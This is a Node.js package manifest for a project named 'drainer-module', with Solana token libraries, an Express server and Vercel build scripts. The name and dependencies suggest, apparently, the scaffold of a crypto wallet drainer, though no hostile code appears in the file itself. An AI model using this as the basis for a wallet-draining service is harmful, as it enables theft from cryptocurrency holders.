{
  "name": "drainer-module",
  "version": "1.0.0",

  "scripts": {
    "dev": "node server.js",
    "start": "node server.js",
    "build": "node vercel-build.js",
    "vercel-build": "node vercel-build.js"
  },
  "engines": {
    "node": "18.x"
  },
  "dependencies": {
    "@solana/spl-token": "^0.4.0",
    "@solana/web3.js": "^1.98.4",
    "bn.js": "^5.2.1",
    "dotenv": "^16.6.1",
    "express": "^4.18.2",
    "express-rate-limit": "^7.5.1",
    "node-fetch": "^3.3.2"
  }
}
